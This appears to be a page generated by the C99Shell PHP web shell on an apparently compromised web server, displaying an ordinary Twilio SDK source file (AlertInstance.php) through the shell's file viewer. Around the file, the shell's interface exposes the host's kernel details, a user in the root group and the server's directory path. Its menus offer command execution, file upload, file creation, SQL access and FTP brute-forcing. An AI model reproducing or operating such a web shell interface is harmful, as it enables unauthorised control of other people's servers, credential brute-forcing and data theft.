!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/vendor/twilio/sdk/src/Twilio/Rest/Monitor/V1/   drwxr-xr-x
Free 28.66 GB of 117.98 GB (24.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AlertInstance.php (4.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Monitor\V1;

use 
Twilio\Deserialize;
use 
Twilio\Exceptions\TwilioException;
use 
Twilio\InstanceResource;
use 
Twilio\Values;
use 
Twilio\Version;

/**
 * @property string $accountSid
 * @property string $alertText
 * @property string $apiVersion
 * @property \DateTime $dateCreated
 * @property \DateTime $dateGenerated
 * @property \DateTime $dateUpdated
 * @property string $errorCode
 * @property string $logLevel
 * @property string $moreInfo
 * @property string $requestMethod
 * @property string $requestUrl
 * @property string $requestVariables
 * @property string $resourceSid
 * @property string $responseBody
 * @property string $responseHeaders
 * @property string $sid
 * @property string $url
 * @property string $requestHeaders
 * @property string $serviceSid
 */
class AlertInstance extends InstanceResource {
    
/**
     * Initialize the AlertInstance
     *
     * @param Version $version Version that contains the resource
     * @param mixed[] $payload The response payload
     * @param string $sid The SID that identifies the resource to fetch
     */
    
public function __construct(Version $version, array $payloadstring $sid null) {
        
parent::__construct($version);

        
// Marshaled Properties
        
$this->properties = [
            
'accountSid' => Values::array_get($payload'account_sid'),
            
'alertText' => Values::array_get($payload'alert_text'),
            
'apiVersion' => Values::array_get($payload'api_version'),
            
'dateCreated' => Deserialize::dateTime(Values::array_get($payload'date_created')),
            
'dateGenerated' => Deserialize::dateTime(Values::array_get($payload'date_generated')),
            
'dateUpdated' => Deserialize::dateTime(Values::array_get($payload'date_updated')),
            
'errorCode' => Values::array_get($payload'error_code'),
            
'logLevel' => Values::array_get($payload'log_level'),
            
'moreInfo' => Values::array_get($payload'more_info'),
            
'requestMethod' => Values::array_get($payload'request_method'),
            
'requestUrl' => Values::array_get($payload'request_url'),
            
'requestVariables' => Values::array_get($payload'request_variables'),
            
'resourceSid' => Values::array_get($payload'resource_sid'),
            
'responseBody' => Values::array_get($payload'response_body'),
            
'responseHeaders' => Values::array_get($payload'response_headers'),
            
'sid' => Values::array_get($payload'sid'),
            
'url' => Values::array_get($payload'url'),
            
'requestHeaders' => Values::array_get($payload'request_headers'),
            
'serviceSid' => Values::array_get($payload'service_sid'),
        ];

        
$this->solution = ['sid' => $sid ?: $this->properties['sid'], ];
    }

    
/**
     * Generate an instance context for the instance, the context is capable of
     * performing various actions.  All instance actions are proxied to the context
     *
     * @return AlertContext Context for this AlertInstance
     */
    
protected function proxy(): AlertContext {
        if (!
$this->context) {
            
$this->context = new AlertContext($this->version$this->solution['sid']);
        }

        return 
$this->context;
    }

    
/**
     * Fetch the AlertInstance
     *
     * @return AlertInstance Fetched AlertInstance
     * @throws TwilioException When an HTTP error occurs.
     */
    
public function fetch(): AlertInstance {
        return 
$this->proxy()->fetch();
    }

    
/**
     * Magic getter to access properties
     *
     * @param string $name Property to access
     * @return mixed The requested property
     * @throws TwilioException For unknown properties
     */
    
public function __get(string $name) {
        if (
\array_key_exists($name$this->properties)) {
            return 
$this->properties[$name];
        }

        if (
\property_exists($this'_' $name)) {
            
$method 'get' \ucfirst($name);
            return 
$this->$method();
        }

        throw new 
TwilioException('Unknown property: ' $name);
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$context = [];
        foreach (
$this->solution as $key => $value) {
            
$context[] = "$key=$value";
        }
        return 
'[Twilio.Monitor.V1.AlertInstance ' \implode(' '$context) . ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--